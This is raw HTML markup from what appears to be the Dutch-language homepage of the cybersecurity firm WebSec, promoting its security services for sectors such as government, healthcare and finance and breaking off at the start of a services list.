/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=128&amp;q=96 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=220&amp;q=96 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=256&amp;q=96 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=360&amp;q=96 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=384&amp;q=96 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=425&amp;q=96 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=480&amp;q=96 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=640&amp;q=96 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=750&amp;q=96 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=828&amp;q=96 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1080&amp;q=96 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1111&amp;q=96 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1200&amp;q=96 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1400&amp;q=96 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1400&amp;q=96"><div class="*:font-bold *:text-[#4800B1]">Uw <strong>{Cybersecurity}</strong><br>Specialist
</div></h1><p class="jsx-bc610b14ced8dbc7 text-13 xs:text-sm xs:leading-loose mx-auto max-w-sm leading-[1.75] text-[#383240] md:max-w-md md:text-base">Geen dreiging is te groot of te klein voor ons. Bij WebSec zetten we geavanceerde cybersecurity-oplossingen in om uw onderneming te beschermen, klaar voor de uitdagingen van zowel vandaag als morgen. Laat WebSec u helpen.</p><div class="jsx-bc610b14ced8dbc7 xs:my-3 xs:w-full xs:left-0 relative mx-auto w-full max-w-2xl"><span class="jsx-bc610b14ced8dbc7 absolute -inset-px border-4 border-white z-1"></span><video loop="" autoplay="" muted="" disablepictureinpicture="" disableremoteplayback="" playsinline="" class="jsx-bc610b14ced8dbc7 outline-none select-none pointer-events-none"><source src="/assets/home/home-animation-900.webm" type="video/webm" class="jsx-bc610b14ced8dbc7"><source src="/assets/home/home-animation-900.mp4" type="video/mp4" class="jsx-bc610b14ced8dbc7"></video></div><div class="jsx-bc610b14ced8dbc7 mx-auto flex w-full max-w-sm flex-col gap-3"><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14" href="https://websec.nl/diensten">Onze Diensten</a><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 border-2 text-sig-red bg-none hover:bg-sig-red/10 shadow-lavender-mid/15" href="https://websec.nl/over-ons">Over Ons</a></div></section><section data-critters-container="true" class="jsx-bc610b14ced8dbc7 mx-auto mt-28 4xl:mt-36 4xl:mb-[22rem] 2xl:mb-[20rem] relative max-lg:hidden w-full max-w-6xl flex px-5"><div class="jsx-bc610b14ced8dbc7 flex flex-col w-[50%] gap-y-6 4xl:gap-y-8 shrink-0 z-[2]"><h1 class="jsx-bc610b14ced8dbc7 4xl:text-[3.6rem] fxcol items-start text-[2.5rem] font-bold leading-snug 4xl:leading-tight 2xl:text-[3rem]"><div class="jsx-bc610b14ced8dbc7 relative h-14 aspect-square fxc mb-2"><img alt="" fetchpriority="high" decoding="async" data-nimg="fill" class="object-contain" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="60px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=16&amp;q=96 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=32&amp;q=96 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=48&amp;q=96 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=60&amp;q=96 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=64&amp;q=96 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=96&amp;q=96 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=120&amp;q=96 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=128&amp;q=96 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=220&amp;q=96 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=256&amp;q=96 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=360&amp;q=96 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=384&amp;q=96 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=425&amp;q=96 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=480&amp;q=96 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=640&amp;q=96 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=750&amp;q=96 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=828&amp;q=96 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1080&amp;q=96 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1111&amp;q=96 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1200&amp;q=96 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1400&amp;q=96 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Flock.06f7881a.png&amp;w=1400&amp;q=96"></div><div class="*:text-[#4800B1] *:font-bold whitespace-nowrap">Uw <strong>{Cybersecurity}</strong><br>Specialist
</div></h1><p class="jsx-bc610b14ced8dbc7 4xl:text-[1.075rem] leading-[1.75] text-[#383240]">Geen dreiging is te groot of te klein voor ons. Bij WebSec zetten we geavanceerde cybersecurity-oplossingen in om uw onderneming te beschermen, klaar voor de uitdagingen van zowel vandaag als morgen. Laat WebSec u helpen.</p><div class="jsx-bc610b14ced8dbc7 flex w-full max-w-md gap-3"><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-10 h-[3.875rem] gap-3 grow" href="https://websec.nl/diensten">Onze Diensten</a><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-10 h-[3.875rem] gap-3 border-2 text-sig-red bg-none hover:bg-sig-red/10 shadow-lavender-mid/15 grow" href="https://websec.nl/over-ons">Over Ons</a></div></div><div class="jsx-bc610b14ced8dbc7 shrink-0 -top-[45px] xl:max-4xl:-left-10 z-1 relative"><span class="jsx-bc610b14ced8dbc7 absolute -inset-px border-4 border-white"></span><video width="900" height="574" loop="" muted="" autoplay="" disablepictureinpicture="" disableremoteplayback="" playsinline="" class="jsx-bc610b14ced8dbc7 max-w-none m-auto pointer-events-none outline-none"><source src="/assets/home/home-animation-900.mp4" type="video/mp4" class="jsx-bc610b14ced8dbc7"><source src="/assets/home/home-animation-900.webm" type="video/webm" class="jsx-bc610b14ced8dbc7"></video><div class="jsx-bc610b14ced8dbc7 absolute bottom-[-22.5rem] -right-8 max-2xl:hidden h-full w-[138%] z-1"><picture><source srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" media="(max-width: 1024px)"><img alt="ground crack with binary bits" fetchpriority="high" loading="eager" decoding="async" data-nimg="fill" class="object-contain max-2xl:hidden" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="(max-width: 1900px) 1111px, 1400px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=16&amp;q=91 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=32&amp;q=91 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=48&amp;q=91 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=60&amp;q=91 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=64&amp;q=91 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=96&amp;q=91 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=120&amp;q=91 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=128&amp;q=91 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=220&amp;q=91 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=256&amp;q=91 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=360&amp;q=91 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=384&amp;q=91 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=425&amp;q=91 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=480&amp;q=91 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=640&amp;q=91 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=750&amp;q=91 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=828&amp;q=91 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1080&amp;q=91 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1111&amp;q=91 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1200&amp;q=91 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1400&amp;q=91 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCrack%20alpha.4fa0f990.png&amp;w=1400&amp;q=91"></picture></div></div></section><section class="max-w-6xl mx-auto xl:px-0 my-20 md:my-24 lg:my-36 lg:px-5 overflow-x-hidden px-0"><h2 class="text-2xl md:text-3xl lg:text-4xl 2xl:text-[2.75rem] font-semibold !leading-snug text-center">Sectoren</h2><div class="rounded-full flex bg-white lg:shadow-homesectortab text-[#6D6082] text-13 xs:text-sm sm:text-base sm:font-normal 2xl:text-lg lg:mt-10 mx-auto w-full"><div class="swiper swiper-initialized swiper-horizontal swiper-free-mode lg:w-full max-lg:!px-5"><div class="swiper-wrapper lg:w-full max-lg:py-6 max-lg:pb-7"><div class="swiper-slide swiper-slide-active !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0 bg-dark-lave text-white">Openbaar</div></div><div class="swiper-slide swiper-slide-next !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Gezondheidszorg</div></div><div class="swiper-slide !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Financieel</div></div><div class="swiper-slide !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Industrieel</div></div><div class="swiper-slide !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Energie</div></div><div class="swiper-slide !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Transport</div></div><div class="swiper-slide !w-auto grow" style="margin-right: 12px;"><div class="fxc h-12 px-5 lg:px-7 shadow-homesectortab lg:shadow-transparent sm:h-12 md:h-14 rounded-full bg-white cursor-pointer lg:flex-grow lg:h-[4.5rem] lg:my-0">Detailhandel</div></div></div></div></div><div class="swiper swiper-virtual swiper-initialized swiper-horizontal swiper-watch-progress !px-5"><div class="swiper-wrapper"><div class="swiper-slide swiper-slide-visible swiper-slide-fully-visible swiper-slide-active" data-swiper-slide-index="0" style="left: 0px; width: 750px; margin-right: 80px;"><div class="flex flex-col max-w-md shrink-0 w-full mx-auto lg:max-w-none md:max-w-[46rem] md:flex-row-reverse lg:justify-between md:gap-7 md:items-center lg:mt-10"><div class="relative w-full h-60 md:w-[50%] md:h-[20rem] shrink-0 lg:h-[30rem]"><img alt="Openbaar sector secured illustration" loading="lazy" decoding="async" data-nimg="fill" class="object-contain" sizes="(max-width: 1020px) 450px, 600px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=16&amp;q=85 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=32&amp;q=85 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=48&amp;q=85 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=60&amp;q=85 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=64&amp;q=85 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=96&amp;q=85 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=120&amp;q=85 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=128&amp;q=85 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=220&amp;q=85 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=256&amp;q=85 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=360&amp;q=85 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=384&amp;q=85 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=425&amp;q=85 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=480&amp;q=85 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=640&amp;q=85 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=750&amp;q=85 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=828&amp;q=85 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=1080&amp;q=85 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=1111&amp;q=85 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=1200&amp;q=85 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=1400&amp;q=85 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Government.b985f4e1.png&amp;w=1400&amp;q=85" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;"></div><div class="lg:mx-2"><h3 class="text-base md:text-xl lg:text-3xl font-semibold mb-2.5 lg:mb-5">Cyberbeveiliging in de Publieke Sector</h3><p class="text-xs pr-6 text-[#3f3847] leading-6 lg:text-base lg:leading-7 max-w-lg">Een op maat gemaakte reeks oplossingen ontworpen om overheidsystemen te beschermen, waarbij de integriteit, veiligheid en dienstcontinuïteit tegen cyberdreigingen gewaarborgd wordt.</p><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 max-w-56 w-full mt-6" href="https://websec.nl/sectoren/publiek-en-overheidssector">Meer Weten</a></div></div></div><div class="swiper-slide swiper-slide-next" data-swiper-slide-index="1" style="left: 0px; width: 750px; margin-right: 80px;"><div class="flex flex-col max-w-md shrink-0 w-full mx-auto lg:max-w-none md:max-w-[46rem] md:flex-row-reverse lg:justify-between md:gap-7 md:items-center lg:mt-10"><div class="relative w-full h-60 md:w-[50%] md:h-[20rem] shrink-0 lg:h-[30rem]"><img alt="Gezondheidszorg sector secured illustration" loading="lazy" decoding="async" data-nimg="fill" class="object-contain" sizes="(max-width: 1020px) 450px, 600px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=16&amp;q=85 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=32&amp;q=85 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=48&amp;q=85 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=60&amp;q=85 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=64&amp;q=85 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=96&amp;q=85 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=120&amp;q=85 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=128&amp;q=85 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=220&amp;q=85 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=256&amp;q=85 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=360&amp;q=85 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=384&amp;q=85 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=425&amp;q=85 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=480&amp;q=85 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=640&amp;q=85 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=750&amp;q=85 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=828&amp;q=85 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=1080&amp;q=85 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=1111&amp;q=85 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=1200&amp;q=85 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=1400&amp;q=85 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Healthcare.a6616a8f.png&amp;w=1400&amp;q=85" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;"></div><div class="lg:mx-2"><h3 class="text-base md:text-xl lg:text-3xl font-semibold mb-2.5 lg:mb-5">Cyberbeveiliging in de Gezondheidszorg</h3><p class="text-xs pr-6 text-[#3f3847] leading-6 lg:text-base lg:leading-7 max-w-lg">Een speciaal pakket diensten gericht op het beschermen van patiëntgegevens en essentiële gezondheidssystemen tegen cyberaanvallen, waarbij vertrouwelijkheid, integriteit en beschikbaarheid wordt gewaarborgd.</p><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 max-w-56 w-full mt-6" href="https://websec.nl/sectoren/gezondheidszorgsector">Meer Weten</a></div></div></div><div class="swiper-slide" data-swiper-slide-index="2" style="left: 0px; width: 750px; margin-right: 80px;"><div class="flex flex-col max-w-md shrink-0 w-full mx-auto lg:max-w-none md:max-w-[46rem] md:flex-row-reverse lg:justify-between md:gap-7 md:items-center lg:mt-10"><div class="relative w-full h-60 md:w-[50%] md:h-[20rem] shrink-0 lg:h-[30rem]"><img alt="Financieel sector secured illustration" loading="lazy" decoding="async" data-nimg="fill" class="object-contain" sizes="(max-width: 1020px) 450px, 600px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=16&amp;q=85 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=32&amp;q=85 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=48&amp;q=85 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=60&amp;q=85 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=64&amp;q=85 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=96&amp;q=85 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=120&amp;q=85 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=128&amp;q=85 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=220&amp;q=85 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=256&amp;q=85 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=360&amp;q=85 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=384&amp;q=85 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=425&amp;q=85 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=480&amp;q=85 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=640&amp;q=85 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=750&amp;q=85 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=828&amp;q=85 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=1080&amp;q=85 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=1111&amp;q=85 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=1200&amp;q=85 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=1400&amp;q=85 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2FCybersecurity%20for%20Finance.ec8891a3.png&amp;w=1400&amp;q=85" style="position: absolute; height: 100%; width: 100%; inset: 0px; color: transparent;"></div><div class="lg:mx-2"><h3 class="text-base md:text-xl lg:text-3xl font-semibold mb-2.5 lg:mb-5">Financiële Cyberbeveiliging</h3><p class="text-xs pr-6 text-[#3f3847] leading-6 lg:text-base lg:leading-7 max-w-lg">Op maat gemaakte cyberbeveiligingsmaatregelen gericht op het beschermen van financiële instellingen tegen cyberdreigingen, waarbij klantgegevens en financiële activa worden beschermd en regelgevende naleving wordt gewaarborgd.</p><a class="min-w-fit font-semibold rounded-full fxc overflow-hidden relative no-underline gap-2 duration-150 shadow outline-none active:ring-0 focus:ring-2 active:scale-[0.97] hover:opacity-85 text-white bg-gradient-to-br from-sig-red to-sig-red/80 ring-sig-red/50 border-sig-red px-8 h-14 max-w-56 w-full mt-6" href="https://websec.nl/sectoren/financiele-banksector">Meer Weten</a></div></div></div></div></div></section><section class="px-5 max-w-6xl mx-auto xl:px-0 my-20 md:my-24 lg:my-36 space-y-7 sm:space-y-12 xl:space-y-14"><h2 class="text-2xl md:text-3xl lg:text-4xl 2xl:text-[2.75rem] font-semibold !leading-snug text-center">Diensten geleverd door WebSec</h2><div class="flex flex-col gap-6 lg:gap-8 sm:grid grid-cols-2"><div class="p-5 md:p-8 lg:p-12 lg:pt-9 shadow-servicecard bg-serviceCard border-serviceCard border flex flex-col rounded-2xl"><div class="flex items-center lg:flex-col lg:items-start"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-contain !relative max-w-[80px] sm:max-w-[100px] aspect-square" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="120px" srcset="/_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=16&amp;q=90 16w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=32&amp;q=90 32w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=48&amp;q=90 48w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=60&amp;q=90 60w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=64&amp;q=90 64w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=96&amp;q=90 96w, /_next/image?url=%2Fassets%2Fservices%2FPentesting.png&amp;w=120&amp;q=90 120w, 